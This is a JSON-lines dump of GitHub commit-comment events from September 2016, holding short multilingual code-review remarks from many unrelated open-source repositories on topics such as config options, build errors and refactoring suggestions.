{"id":"4630656731","type":"CommitCommentEvent","actor":{"login":"SebastianJay"},"repo":{"name":"SebastianJay/Wilderness"},"payload":{"comment":{"id":19207225,"position":71,"line":28,"path":"src/window_draw.py","commit_id":"eab1ee2134ca94cac4e349f71fa5c3dff54a6054","created_at":"2016-09-28T13:29:56Z","updated_at":"2016-09-28T13:29:56Z","body":"I don't agree with the dict approach. key increments sequentially so there is no added benefit of using an associative array.\r\n\r\nYou can do `output_list = [[]]` at start and when key increments you do `output_list.append([])`"}},"created_at":"2016-09-28T13:29:56Z"}
{"id":"4630657196","type":"CommitCommentEvent","actor":{"login":"bbondy"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":19207226,"position":null,"line":null,"path":null,"commit_id":"d19ce40ebe8e42dc591b6f637b392de0f2e11e1a","created_at":"2016-09-28T13:30:00Z","updated_at":"2016-09-28T13:30:00Z","body":"Auditors: @bridiver "}},"created_at":"2016-09-28T13:30:00Z"}
{"id":"4630661182","type":"CommitCommentEvent","actor":{"login":"shainer"},"repo":{"name":"calamares/calamares"},"payload":{"comment":{"id":19207233,"position":null,"line":null,"path":null,"commit_id":"fc8e29bf35680cdd96a21f636f9b5be3b78038a7","created_at":"2016-09-28T13:30:41Z","updated_at":"2016-09-28T13:30:41Z","body":"Should the list of possible shells be part of the module configuration?"}},"created_at":"2016-09-28T13:30:41Z"}
{"id":"4630662018","type":"CommitCommentEvent","actor":{"login":"ademaro"},"repo":{"name":"blackio/hazy-shade"},"payload":{"comment":{"id":19207235,"position":2,"line":2,"path":"src/page/header/__menu/header__menu.pug","commit_id":"bcf452b1abb96bd0c788a285f2b0b0a54c04fcba","created_at":"2016-09-28T13:30:49Z","updated_at":"2016-09-28T13:30:49Z","body":"👍 "}},"created_at":"2016-09-28T13:30:49Z"}
{"id":"4630672215","type":"CommitCommentEvent","actor":{"login":"udeved"},"repo":{"name":"calamares/calamares"},"payload":{"comment":{"id":19207256,"position":null,"line":null,"path":null,"commit_id":"fc8e29bf35680cdd96a21f636f9b5be3b78038a7","created_at":"2016-09-28T13:32:36Z","updated_at":"2016-09-28T13:32:36Z","body":"Good question, I asked myself the same, but its perhaps easier to just add a scalar to yaml conf, where one shell is specified.\r\n\r\neg \r\nlogin_shell: /bin/zsh\r\n\r\nwhile defaulting to bash?"}},"created_at":"2016-09-28T13:32:36Z"}
{"id":"4630672240","type":"CommitCommentEvent","actor":{"login":"cesartecnicas"},"repo":{"name":"TP0602-09/grupo-09"},"payload":{"comment":{"id":19207258,"position":null,"line":null,"path":null,"commit_id":"5b281ef55bbebb203183abc04fec9f51f0d2f736","created_at":"2016-09-28T13:32:37Z","updated_at":"2016-09-28T13:32:37Z","body":"No suban librerías que se pueden obtener vía gradle."}},"created_at":"2016-09-28T13:32:37Z"}
{"id":"4630672489","type":"CommitCommentEvent","actor":{"login":"devernay"},"repo":{"name":"devernay/openfx-misc"},"payload":{"comment":{"id":19207260,"position":null,"line":null,"path":null,"commit_id":"d80a81ae66911f54a382438efa47d1b1771a29d1","created_at":"2016-09-28T13:32:39Z","updated_at":"2016-09-28T13:32:39Z","body":"for example, link the min/max luminance pixel value to the white/black points of a grade node"}},"created_at":"2016-09-28T13:32:39Z"}
{"id":"4630673898","type":"CommitCommentEvent","actor":{"login":"abolfazlghavami"},"repo":{"name":"abolfazlghavami/abplfazlb"},"payload":{"comment":{"id":19207263,"position":5,"line":231,"path":"bot/bot.lua","commit_id":"68f00d02fdb657fb99c08e18bdf86fde83f5cb8e","created_at":"2016-09-28T13:32:52Z","updated_at":"2016-09-28T13:32:52Z","body":"222968438\r\n"}},"created_at":"2016-09-28T13:32:52Z"}
{"id":"4630675809","type":"CommitCommentEvent","actor":{"login":"abolfazlghavami"},"repo":{"name":"abolfazlghavami/abplfazlb"},"payload":{"comment":{"id":19207267,"position":4,"line":231,"path":"bot/bot.lua","commit_id":"68f00d02fdb657fb99c08e18bdf86fde83f5cb8e","created_at":"2016-09-28T13:33:12Z","updated_at":"2016-09-28T13:33:12Z","body":"222968438"}},"created_at":"2016-09-28T13:33:12Z"}
{"id":"4630678339","type":"CommitCommentEvent","actor":{"login":"vladyan"},"repo":{"name":"vladyan/vladyan.github.io"},"payload":{"comment":{"id":19207273,"position":39,"line":39,"path":"src/pug/components/inspirations.pug","commit_id":"085dbc8b2810724b33eeaf019f3c39fe7f72795e","created_at":"2016-09-28T13:33:39Z","updated_at":"2016-09-28T13:33:39Z","body":"inspirations_mobile блок нужно было inspirations-mobile. only-mobile — скорее микс, если я правильно понял, их предназначение. Хотя в принципе его можно выкинуть от сюда."}},"created_at":"2016-09-28T13:33:39Z"}
{"id":"4630680284","type":"CommitCommentEvent","actor":{"login":"weiwen22"},"repo":{"name":"PeterWolf-tw/ESOE-CS101-2016"},"payload":{"comment":{"id":19207279,"position":null,"line":null,"path":null,"commit_id":"ac675fb0553a04689c9c3e13be2b168fa8dabd78","created_at":"2016-09-28T13:33:59Z","updated_at":"2016-09-28T13:33:59Z","body":"好像被誤刪了"}},"created_at":"2016-09-28T13:33:59Z"}
{"id":"4630680889","type":"CommitCommentEvent","actor":{"login":"jlecoeur"},"repo":{"name":"lis-epfl/MAVRIC_Library"},"payload":{"comment":{"id":19207281,"position":15,"line":123,"path":"mission/mission_handler_landing.hxx","commit_id":"b2f2dbe504c4e881fdc96f7388690501336a7189","created_at":"2016-09-28T13:34:05Z","updated_at":"2016-09-28T13:34:05Z","body":"ok then this simplifies to\r\n```cpp\r\nfloat z_lim = desc_to_ground_altitude_ - desc_to_ground_range_;\r\nif (ins_.position_lf()[Z] > z_lim)\r\n{\r\n    ...\r\n}\r\n```"}},"created_at":"2016-09-28T13:34:05Z"}
{"id":"4630681216","type":"CommitCommentEvent","actor":{"login":"ademaro"},"repo":{"name":"blackio/hazy-shade"},"payload":{"comment":{"id":19207282,"position":null,"line":null,"path":null,"commit_id":"bcf452b1abb96bd0c788a285f2b0b0a54c04fcba","created_at":"2016-09-28T13:34:09Z","updated_at":"2016-09-28T13:34:09Z","body":"В целом — молодец, хорошая модульность, понимание pug, приятный sass. "}},"created_at":"2016-09-28T13:34:09Z"}
{"id":"4630681461","type":"CommitCommentEvent","actor":{"login":"zxdgoal"},"repo":{"name":"carloslancha/liferay-portal"},"payload":{"comment":{"id":19207283,"position":32,"line":349,"path":"modules/apps/web-experience/layout/layout-taglib/src/main/resources/META-INF/resources/layouts_tree/js/layouts_tree_state.js","commit_id":"05f40409d1544493bc2925ab930048b78c4db6ab","created_at":"2016-09-28T13:34:11Z","updated_at":"2016-09-28T13:34:11Z","body":"We should use forceChildrenState, and the logic is reversed.\r\n\r\nIf ``forceChildrenState == true``, ``checked'' should remain same state.\r\n\r\nIf ``forceChildrenState==false ir undefined``, ``checked'' should be ``undefined``."}},"created_at":"2016-09-28T13:34:11Z"}
{"id":"4630684015","type":"CommitCommentEvent","actor":{"login":"ltratt"},"repo":{"name":"softdevteam/warmup_experiment"},"payload":{"comment":{"id":19207288,"position":null,"line":null,"path":null,"commit_id":"6e5a743667943445483d82b0bd06f690936a3521","created_at":"2016-09-28T13:34:37Z","updated_at":"2016-09-28T13:34:37Z","body":"One quick question: does `run_shell_cmd` run the process to completion and only then return `stderr`? [What we don't want is the child process to be waiting on us to read its output.]"}},"created_at":"2016-09-28T13:34:37Z"}
{"id":"4630684978","type":"CommitCommentEvent","actor":{"login":"weiwen22"},"repo":{"name":"PeterWolf-tw/ESOE-CS101-2016"},"payload":{"comment":{"id":19207290,"position":null,"line":null,"path":null,"commit_id":"ac675fb0553a04689c9c3e13be2b168fa8dabd78","created_at":"2016-09-28T13:34:47Z","updated_at":"2016-09-28T13:34:47Z","body":"再傳一次"}},"created_at":"2016-09-28T13:34:47Z"}
{"id":"4630695140","type":"CommitCommentEvent","actor":{"login":"thierryOrdissimo"},"repo":{"name":"thierryOrdissimo/browser-laptop"},"payload":{"comment":{"id":19207306,"position":null,"line":null,"path":null,"commit_id":"dc5d2220938c0efe8ec0c160e5649cc9ddcd1b2d","created_at":"2016-09-28T13:36:28Z","updated_at":"2016-09-28T13:36:28Z","body":"inspired by the lib 'os-locale'"}},"created_at":"2016-09-28T13:36:28Z"}
{"id":"4630706918","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/balrog"},"payload":{"comment":{"id":19207320,"position":null,"line":null,"path":null,"commit_id":"96e84329c8d76c85e28c53478d6fad4ff88da46c","created_at":"2016-09-28T13:38:24Z","updated_at":"2016-09-28T13:38:24Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#S4MXAJKgQtmzB8_DehQjyQ"}},"created_at":"2016-09-28T13:38:24Z"}
{"id":"4630708275","type":"CommitCommentEvent","actor":{"login":"okonet"},"repo":{"name":"netlify/netlify-cms"},"payload":{"comment":{"id":19207323,"position":7,"line":15,"path":"src/containers/CollectionPage.js","commit_id":"366fe4c787dad242805c7c44df71051da3dd842e","created_at":"2016-09-28T13:38:37Z","updated_at":"2016-09-28T13:38:37Z","body":"Why aren't you using class properties for that?"}},"created_at":"2016-09-28T13:38:37Z"}
{"id":"4630712729","type":"CommitCommentEvent","actor":{"login":"thomasJang"},"repo":{"name":"ax5ui/ax5ui-kernel"},"payload":{"comment":{"id":19207327,"position":99,"line":730,"path":"src/ax5ui-picker/dist/ax5picker.js","commit_id":"dbcf43fdd473925bf0fa53d3947b1dbcf322457c","created_at":"2016-09-28T13:39:22Z","updated_at":"2016-09-28T13:39:22Z","body":"PICKER.tmp.get 함수의 this를  call메소를 이용하여 조작하여 호출합니다.\r\n이때 \"pickerTmpl\"과 item을 인자로 이용합니다.\r\n\r\n@sera0731 "}},"created_at":"2016-09-28T13:39:22Z"}
{"id":"4630715190","type":"CommitCommentEvent","actor":{"login":"thomasJang"},"repo":{"name":"ax5ui/ax5ui-kernel"},"payload":{"comment":{"id":19207333,"position":135,"line":883,"path":"src/ax5ui-picker/dist/ax5picker.js","commit_id":"dbcf43fdd473925bf0fa53d3947b1dbcf322457c","created_at":"2016-09-28T13:39:47Z","updated_at":"2016-09-28T13:39:47Z","body":"이 부분이 빠진건 이해 하셨죠?"}},"created_at":"2016-09-28T13:39:47Z"}
{"id":"4630716010","type":"CommitCommentEvent","actor":{"login":"thomasJang"},"repo":{"name":"ax5ui/ax5ui-kernel"},"payload":{"comment":{"id":19207336,"position":135,"line":883,"path":"src/ax5ui-picker/dist/ax5picker.js","commit_id":"dbcf43fdd473925bf0fa53d3947b1dbcf322457c","created_at":"2016-09-28T13:39:56Z","updated_at":"2016-09-28T13:39:56Z","body":"@sera0731 "}},"created_at":"2016-09-28T13:39:56Z"}
{"id":"4630716043","type":"CommitCommentEvent","actor":{"login":"okonet"},"repo":{"name":"netlify/netlify-cms"},"payload":{"comment":{"id":19207337,"position":5,"line":13,"path":"src/containers/CollectionPage.js","commit_id":"366fe4c787dad242805c7c44df71051da3dd842e","created_at":"2016-09-28T13:39:56Z","updated_at":"2016-09-28T13:39:56Z","body":"You can just cal `super()` if you are not accessing `props` in the constructor. "}},"created_at":"2016-09-28T13:39:56Z"}
{"id":"4630719331","type":"CommitCommentEvent","actor":{"login":"thomasJang"},"repo":{"name":"ax5ui/ax5ui-kernel"},"payload":{"comment":{"id":19207342,"position":108,"line":820,"path":"src/ax5ui-picker/dist/ax5picker.js","commit_id":"dbcf43fdd473925bf0fa53d3947b1dbcf322457c","created_at":"2016-09-28T13:40:28Z","updated_at":"2016-09-28T13:40:28Z","body":"@sera0731 \r\nPICKER변수를 ax5.ui.picker로 싱크합니다."}},"created_at":"2016-09-28T13:40:28Z"}
{"id":"4630721966","type":"CommitCommentEvent","actor":{"login":"shainer"},"repo":{"name":"calamares/calamares"},"payload":{"comment":{"id":19207353,"position":null,"line":null,"path":null,"commit_id":"fc8e29bf35680cdd96a21f636f9b5be3b78038a7","created_at":"2016-09-28T13:40:55Z","updated_at":"2016-09-28T13:40:55Z","body":"But then you can only set two shells. I would offer it in the module conf and default to /bin/bash only if nothing is specified there."}},"created_at":"2016-09-28T13:40:55Z"}
{"id":"4630722528","type":"CommitCommentEvent","actor":{"login":"bodia-uz"},"repo":{"name":"apollostack/subscriptions-transport-ws"},"payload":{"comment":{"id":19207356,"position":15,"line":32,"path":"package.json","commit_id":"8068f617ec39b7ac907db16e78d57d74d98ee64b","created_at":"2016-09-28T13:41:01Z","updated_at":"2016-09-28T13:41:01Z","body":"I seems that  package `@types/node` is private\r\n```\r\nnpm install subscriptions-transport-ws -S\r\nnpm ERR! Darwin 15.6.0\r\nnpm ERR! argv \"/usr/local/Cellar/node/6.5.0/bin/node\" \"/usr/local/bin/npm\" \"install\" \"subscriptions-transport-ws\" \"-S\"\r\nnpm ERR! node v6.5.0\r\nnpm ERR! npm  v3.10.3\r\nnpm ERR! code E403\r\n\r\nnpm ERR! user npmuser is not allowed to access package @types/node : @types/node\r\n```"}},"created_at":"2016-09-28T13:41:01Z"}
{"id":"4630723899","type":"CommitCommentEvent","actor":{"login":"olleharstedt"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":19207359,"position":null,"line":null,"path":null,"commit_id":"1e5f80c0dc73eb3fcff156f2d1458f21ec00c377","created_at":"2016-09-28T13:41:14Z","updated_at":"2016-09-28T13:41:14Z","body":"Not all code fit into model, view or controller. There will be libraries and helpers. (Not in this case, though.)"}},"created_at":"2016-09-28T13:41:14Z"}
{"id":"4630726580","type":"CommitCommentEvent","actor":{"login":"mtanda"},"repo":{"name":"grafana/grafana"},"payload":{"comment":{"id":19207365,"position":33,"line":73,"path":"public/app/plugins/datasource/prometheus/datasource.ts","commit_id":"add9e7e3a03ad519156758a8e63944db0516586d","created_at":"2016-09-28T13:41:38Z","updated_at":"2016-09-28T13:41:38Z","body":"The more complex query is like\r\n`node_memory_MemTotal{job=\"node\"} - node_memory_MemFree{job=\"node\"}`\r\nhttp://demo.robustperception.io:9090/graph?g0.range_input=1h&g0.expr=node_memory_MemTotal%7Bjob%3D%22node%22%7D+-+node_memory_MemFree%7Bjob%3D%22node%22%7D&g0.tab=1\r\n\r\nAll `job=\"node\"` is filter part.\r\nSo it is meaningless to find first \"{\"."}},"created_at":"2016-09-28T13:41:38Z"}
{"id":"4630727068","type":"CommitCommentEvent","actor":{"login":"gadernal"},"repo":{"name":"gadernal/gadernal.github.io"},"payload":{"comment":{"id":19207368,"position":null,"line":null,"path":null,"commit_id":"51980c610a7ba20c825af35ed7047becfb6364ae","created_at":"2016-09-28T13:41:43Z","updated_at":"2016-09-28T13:41:43Z","body":"delete cname"}},"created_at":"2016-09-28T13:41:43Z"}
{"id":"4630729003","type":"CommitCommentEvent","actor":{"login":"peiofour"},"repo":{"name":"vpg/casperjs"},"payload":{"comment":{"id":19207371,"position":60,"line":2811,"path":"modules/casper.js","commit_id":"c1a13f6f96116b0f69b1b4f71c199767d24d7308","created_at":"2016-09-28T13:42:03Z","updated_at":"2016-09-28T13:42:03Z","body":"1 space missing"}},"created_at":"2016-09-28T13:42:03Z"}
{"id":"4630732437","type":"CommitCommentEvent","actor":{"login":"jfoug"},"repo":{"name":"magnumripper/JohnTheRipper"},"payload":{"comment":{"id":19207379,"position":null,"line":null,"path":null,"commit_id":"7b47e453b4207fd758a2e2d2f5c642c15a8f32a6","created_at":"2016-09-28T13:42:37Z","updated_at":"2016-09-28T13:42:37Z","body":"NOTE,  I expect to see ASAN problems in the GPU code. I have never been able to run ASAN builds against GPU yet (I virtualize all my GPU stuff).  Now that I am moving from VirtualBox to HyperV for my virtual environments, I may be able to GPU build. VB can not build properly (GPU) at least that I have found out how to do, but I think HyperV can properly handle the GPUs in the system.\r\n\r\nBut I have strongly expected to see GPU problems.  When I get to work, I will dig in and see if I can spot the ASAN problem here."}},"created_at":"2016-09-28T13:42:37Z"}
{"id":"4630733151","type":"CommitCommentEvent","actor":{"login":"yinqiwen"},"repo":{"name":"yinqiwen/gsnova"},"payload":{"comment":{"id":19207380,"position":null,"line":null,"path":null,"commit_id":"54e857c7c7e1b7996f88d075b0b1ec2a9d1d2361","created_at":"2016-09-28T13:42:44Z","updated_at":"2016-09-28T13:42:44Z","body":"1. u need to edit hosts.json to replace the fake ip like \"10.10.10.10\"\r\n2. u can see that for port 48100 all rule is just forward traffic directly, u need to set `Remote` to a proxy channel  `vultr` in your config. \r\n\r\n     {\r\n        \"Local\": \":48100\",\r\n        //sniff sni for non 80 port(http) traffic instead of real target address, default is false        \r\n        \"SNISniff\": true,\r\n        \"PAC\":[     \r\n            {\"Remote\":\"vultr\"}\r\n        ]\r\n    },\r\n"}},"created_at":"2016-09-28T13:42:44Z"}
{"id":"4630734483","type":"CommitCommentEvent","actor":{"login":"vladyan"},"repo":{"name":"vladyan/vladyan.github.io"},"payload":{"comment":{"id":19207383,"position":28,"line":28,"path":"src/js/script.js","commit_id":"085dbc8b2810724b33eeaf019f3c39fe7f72795e","created_at":"2016-09-28T13:42:57Z","updated_at":"2016-09-28T13:42:57Z","body":"Этот кусок кода удален. Но согласен, что лучше селектор добавить, чем стили на прямую задавать."}},"created_at":"2016-09-28T13:42:57Z"}
{"id":"4630736708","type":"CommitCommentEvent","actor":{"login":"jpoirier"},"repo":{"name":"jpoirier/gortlsdr"},"payload":{"comment":{"id":19207388,"position":null,"line":null,"path":null,"commit_id":"90cc51292cd65eebb98c53166d862ed22435a3f7","created_at":"2016-09-28T13:43:19Z","updated_at":"2016-09-28T13:43:19Z","body":"The examples and your test file all seem to work, along with the moc test, but I'll do more extensive testing this weekend and if all goes well I'll merge develop in to master.\r\n\r\nThere's really no good way to make breaking changes but once we get the develop branch merged to master we can add the user context parameter to the callback function.  "}},"created_at":"2016-09-28T13:43:19Z"}
{"id":"4630737711","type":"CommitCommentEvent","actor":{"login":"brice-morin"},"repo":{"name":"SINTEF-9012/ThingML"},"payload":{"comment":{"id":19207391,"position":null,"line":null,"path":null,"commit_id":"8309903043030b3fde727dbabdc9987665fa6ad5","created_at":"2016-09-28T13:43:28Z","updated_at":"2016-09-28T13:43:28Z","body":"fixing @Lyadis errors?"}},"created_at":"2016-09-28T13:43:28Z"}
{"id":"4630737723","type":"CommitCommentEvent","actor":{"login":"TiagoAFontana"},"repo":{"name":"eclufsc/ophidian"},"payload":{"comment":{"id":19207392,"position":24,"line":21,"path":"ophidian/parser/LibertyParser.cpp","commit_id":"9bb6cf2e71d85928015fc00d607e01c78446f05b","created_at":"2016-09-28T13:43:28Z","updated_at":"2016-09-28T13:43:28Z","body":"Ok. I added a call si2drPIQuit(&err); in destructor of Pimpl."}},"created_at":"2016-09-28T13:43:28Z"}
{"id":"4630738995","type":"CommitCommentEvent","actor":{"login":"balta2ar"},"repo":{"name":"docopt/docopt.rs"},"payload":{"comment":{"id":19207395,"position":null,"line":null,"path":null,"commit_id":"e3f86318c635f6b96003781e2a584b09d5a0d9c7","created_at":"2016-09-28T13:43:40Z","updated_at":"2016-09-28T13:43:40Z","body":"@BurntSushi I'm new to rust and I couldn't find what's the best way to catch Broken pipe error in rust 1.11 stable. Do I get it right that this change simply ignores the error but the loop continues running? Is there a way to catch pipe error and terminate execution without printing a stack trace? This is for my own rust education."}},"created_at":"2016-09-28T13:43:40Z"}
{"id":"4630740517","type":"CommitCommentEvent","actor":{"login":"jrmbrgs"},"repo":{"name":"vpg/casperjs"},"payload":{"comment":{"id":19207399,"position":60,"line":2811,"path":"modules/casper.js","commit_id":"c1a13f6f96116b0f69b1b4f71c199767d24d7308","created_at":"2016-09-28T13:43:56Z","updated_at":"2016-09-28T13:43:56Z","body":"indeed"}},"created_at":"2016-09-28T13:43:56Z"}
{"id":"4630741395","type":"CommitCommentEvent","actor":{"login":"henrypp"},"repo":{"name":"henrypp/wfptool"},"payload":{"comment":{"id":19207403,"position":null,"line":null,"path":null,"commit_id":"206273ce32e2d0fd528b7e7aa6d5a154d30154dd","created_at":"2016-09-28T13:44:04Z","updated_at":"2016-09-28T13:44:04Z","body":"done. thank you!"}},"created_at":"2016-09-28T13:44:04Z"}
{"id":"4630741744","type":"CommitCommentEvent","actor":{"login":"jdef"},"repo":{"name":"mesosphere/marathon"},"payload":{"comment":{"id":19207405,"position":83,"line":120,"path":"src/main/scala/mesosphere/marathon/api/v2/validation/PodsValidation.scala","commit_id":"35478b0416cbffebe60ef95467e7a5c5da8aae48","created_at":"2016-09-28T13:44:07Z","updated_at":"2016-09-28T13:44:07Z","body":"we don't need to know that here. only that the volume named \"foo\" will be mounted in the container at /some/path"}},"created_at":"2016-09-28T13:44:07Z"}
{"id":"4630743314","type":"CommitCommentEvent","actor":{"login":"jrmbrgs"},"repo":{"name":"vpg/casperjs"},"payload":{"comment":{"id":19207406,"position":60,"line":2811,"path":"modules/casper.js","commit_id":"c1a13f6f96116b0f69b1b4f71c199767d24d7308","created_at":"2016-09-28T13:44:23Z","updated_at":"2016-09-28T13:44:23Z","body":"worst there is evil tab :/"}},"created_at":"2016-09-28T13:44:23Z"}
{"id":"4630744122","type":"CommitCommentEvent","actor":{"login":"FlorianBecher"},"repo":{"name":"FlorianBecher/random_generator"},"payload":{"comment":{"id":19207409,"position":null,"line":null,"path":null,"commit_id":"bf1b8dc6cd6d8800f89921eeab38d0f18ba9e699","created_at":"2016-09-28T13:44:31Z","updated_at":"2016-09-28T13:44:31Z","body":"Kool"}},"created_at":"2016-09-28T13:44:31Z"}
{"id":"4630745000","type":"CommitCommentEvent","actor":{"login":"cassiozen"},"repo":{"name":"netlify/netlify-cms"},"payload":{"comment":{"id":19207412,"position":7,"line":15,"path":"src/containers/CollectionPage.js","commit_id":"366fe4c787dad242805c7c44df71051da3dd842e","created_at":"2016-09-28T13:44:39Z","updated_at":"2016-09-28T13:44:39Z","body":"The project was using straight ES6. We definitively should use class properties in the future, but I didn't want to start in the middle of the project (considering that all other classes are implemented this way). Maybe refactor with Codemod in the future..."}},"created_at":"2016-09-28T13:44:39Z"}
{"id":"4630746163","type":"CommitCommentEvent","actor":{"login":"jzwart"},"repo":{"name":"jzwart/LakeCarbonEnKF"},"payload":{"comment":{"id":19207413,"position":null,"line":null,"path":null,"commit_id":"a091e19e7f26554448678e1bf3d863601714f50a","created_at":"2016-09-28T13:44:51Z","updated_at":"2016-09-28T13:44:51Z","body":"Added entrainment volume from hypolimnion, hypolimnion DOC & DIC (and linear interpolation of hypo DOC & DIC)."}},"created_at":"2016-09-28T13:44:51Z"}
{"id":"4630746255","type":"CommitCommentEvent","actor":{"login":"FlorianBecher"},"repo":{"name":"FlorianBecher/random_generator"},"payload":{"comment":{"id":19207414,"position":null,"line":null,"path":null,"commit_id":"734f589be190094d3f15c80bcb9d7363826f7eec","created_at":"2016-09-28T13:44:52Z","updated_at":"2016-09-28T13:44:52Z","body":"such creative\r\nmuch wow"}},"created_at":"2016-09-28T13:44:52Z"}
{"id":"4630747128","type":"CommitCommentEvent","actor":{"login":"licaon-kter"},"repo":{"name":"siacs/Conversations"},"payload":{"comment":{"id":19207415,"position":null,"line":null,"path":null,"commit_id":"b0fb9fd9ee7ae8a9dc08159dcd4a718e08dcb314","created_at":"2016-09-28T13:45:01Z","updated_at":"2016-09-28T13:45:01Z","body":"The thing is that Transifex warns:\r\n```\r\n    Warning: The following url is either missing from the translation or has been translated: 'conference.example.com/nick'.\r\n    Warning: The following email is either missing from the translation or has been translated: 'room@conference.example'.\r\n```"}},"created_at":"2016-09-28T13:45:01Z"}
{"id":"4630748868","type":"CommitCommentEvent","actor":{"login":"AcesHigh70"},"repo":{"name":"digipost/saaj"},"payload":{"comment":{"id":19207420,"position":null,"line":null,"path":null,"commit_id":"fe02d272512207008413a5d8167a710a727f93a1","created_at":"2016-09-28T13:45:19Z","updated_at":"2016-09-28T13:45:19Z","body":"Yes, I think that if you're running with the patch from commit fe02d27 that you won't see the issue... and that may be the solution if there is a performance benefit from this patch as opposed to doing some sort of synchronization in ContextClassloaderLocal.  ContextClassloaderLocal would definitely need some documentation saying it isn't thread safe.  \r\n\r\nI don't know the history of why things were done this way, but I do remember seeing some comments somewhere about performance issues in some versions of EnvelopeFactory and ParserPool.  I'm not sure if the changes that introduced this issue were related to performance improvements.\r\n\r\nAs far as making ContextClassloaderLocal thread safe, I haven't done that.  I did synchronize around ParserPool.get().get() in EnvelopeFactory and I didn't see the issue with that change.\r\n\r\nBy the way (excuse my ignorance), what's a PR?"}},"created_at":"2016-09-28T13:45:19Z"}
{"id":"4630751557","type":"CommitCommentEvent","actor":{"login":"CleoQc"},"repo":{"name":"DexterInd/Raspbian_For_Robots"},"payload":{"comment":{"id":19207430,"position":null,"line":null,"path":null,"commit_id":"feef08aa013223a1eed26219420eca7c1b887702","created_at":"2016-09-28T13:45:47Z","updated_at":"2016-09-28T13:45:47Z","body":"decision taken after skype discussion. That if statement was counterproductive in some cases."}},"created_at":"2016-09-28T13:45:47Z"}
{"id":"4630754036","type":"CommitCommentEvent","actor":{"login":"sipa"},"repo":{"name":"sdaftuar/bitcoin"},"payload":{"comment":{"id":19207434,"position":5,"line":5288,"path":"src/main.cpp","commit_id":"d990722b56f02f3272c49eeef4c952992bd9efaa","created_at":"2016-09-28T13:46:12Z","updated_at":"2016-09-28T13:46:12Z","body":"This will break with a hypothetical v3 sendcmpct, I think?"}},"created_at":"2016-09-28T13:46:12Z"}
{"id":"4630758663","type":"CommitCommentEvent","actor":{"login":"awhiemstra"},"repo":{"name":"Ultimaker/Uranium"},"payload":{"comment":{"id":19207442,"position":25,"line":334,"path":"UM/Settings/Models/SettingPropertyProvider.py","commit_id":"aaf0f8c905d9a8ea1d321a206a41109adc25aa40","created_at":"2016-09-28T13:46:56Z","updated_at":"2016-09-28T13:46:56Z","body":"Note that you should make sure to clear self._validator when self._key or self._stack changes."}},"created_at":"2016-09-28T13:46:56Z"}
{"id":"4630759912","type":"CommitCommentEvent","actor":{"login":"Moyster"},"repo":{"name":"MediatekAndroidDevelopers/android_kernel_jiayu_s3plus_n560a"},"payload":{"comment":{"id":19207446,"position":null,"line":null,"path":null,"commit_id":"022a1974c2721adec030b291eb0631fa25a92868","created_at":"2016-09-28T13:47:08Z","updated_at":"2016-09-28T13:47:08Z","body":"The latest commits also introduced :\r\n\"CONFIG_SLUB_CPU_PARTIAL=y\"\r\n(else it stops inline building and wait for human input)"}},"created_at":"2016-09-28T13:47:08Z"}
{"id":"4630760643","type":"CommitCommentEvent","actor":{"login":"BurntSushi"},"repo":{"name":"docopt/docopt.rs"},"payload":{"comment":{"id":19207448,"position":null,"line":null,"path":null,"commit_id":"e3f86318c635f6b96003781e2a584b09d5a0d9c7","created_at":"2016-09-28T13:47:15Z","updated_at":"2016-09-28T13:47:15Z","body":"You're right to point out that I was being a little careless here. While this does avoid panicing on a pipe error, it also avoids handling any other kind of error too.\r\n\r\nIn `xsv` I was a bit more fastidious about this, and handled the pipe error explicitly: https://github.com/BurntSushi/xsv/blob/master/src/main.rs#L122-L125"}},"created_at":"2016-09-28T13:47:15Z"}
{"id":"4630763984","type":"CommitCommentEvent","actor":{"login":"awilhelmer"},"repo":{"name":"Isammoc/play-angular2-typescript"},"payload":{"comment":{"id":19207454,"position":null,"line":null,"path":null,"commit_id":"d40e427a40aed05af5eee98d625de85bfbd78bbc","created_at":"2016-09-28T13:47:48Z","updated_at":"2016-09-28T13:47:48Z","body":"I am running a app with play and this sbt-typescript template with angular2 final. I am using rxjs beta 11, that works fine. The only problem is to get transpiled minified files for the browser (Method 3 joost-de-vries describes in the readme). Is there a way to get it to work?"}},"created_at":"2016-09-28T13:47:48Z"}
{"id":"4630765113","type":"CommitCommentEvent","actor":{"login":"lindafan129"},"repo":{"name":"lindafan129/ffd"},"payload":{"comment":{"id":19207457,"position":null,"line":null,"path":null,"commit_id":"dc8b9deefd251a4151d31c795f39848c9a4a4023","created_at":"2016-09-28T13:47:59Z","updated_at":"2016-09-28T13:47:59Z","body":"I WANT MERGE"}},"created_at":"2016-09-28T13:47:59Z"}
{"id":"4630768634","type":"CommitCommentEvent","actor":{"login":"andrew-aladev"},"repo":{"name":"socketio/engine.io-client"},"payload":{"comment":{"id":19207465,"position":null,"line":null,"path":null,"commit_id":"2c55b278a491bf45313ecc0825cf800e2f7ff5c1","created_at":"2016-09-28T13:48:33Z","updated_at":"2016-09-28T13:48:33Z","body":"WAT? Are you crazy?"}},"created_at":"2016-09-28T13:48:33Z"}
{"id":"4630770382","type":"CommitCommentEvent","actor":{"login":"KseniaKa"},"repo":{"name":"KseniaKa/Perl"},"payload":{"comment":{"id":19207471,"position":null,"line":null,"path":null,"commit_id":"6016e4fd458622e65cb2e675649ec0e857163f40","created_at":"2016-09-28T13:48:50Z","updated_at":"2016-09-28T13:48:50Z","body":"Lecture 1"}},"created_at":"2016-09-28T13:48:50Z"}
{"id":"4630770588","type":"CommitCommentEvent","actor":{"login":"MajorPlayz"},"repo":{"name":"VCraftMCPE/Crate"},"payload":{"comment":{"id":19207473,"position":null,"line":null,"path":null,"commit_id":"364deeab0cf9059377005cdfcdf6e852f83d0d65","created_at":"2016-09-28T13:48:53Z","updated_at":"2016-09-28T13:48:53Z","body":":D"}},"created_at":"2016-09-28T13:48:53Z"}
{"id":"4630771264","type":"CommitCommentEvent","actor":{"login":"genglei0816"},"repo":{"name":"qlcoder-oreo/welcome2git"},"payload":{"comment":{"id":19207476,"position":4,"line":166,"path":"README.md","commit_id":"acc69946907de3f1e3718329363fbf2e087b3f85","created_at":"2016-09-28T13:48:59Z","updated_at":"2016-09-28T13:48:59Z","body":"布鲁note"}},"created_at":"2016-09-28T13:48:59Z"}
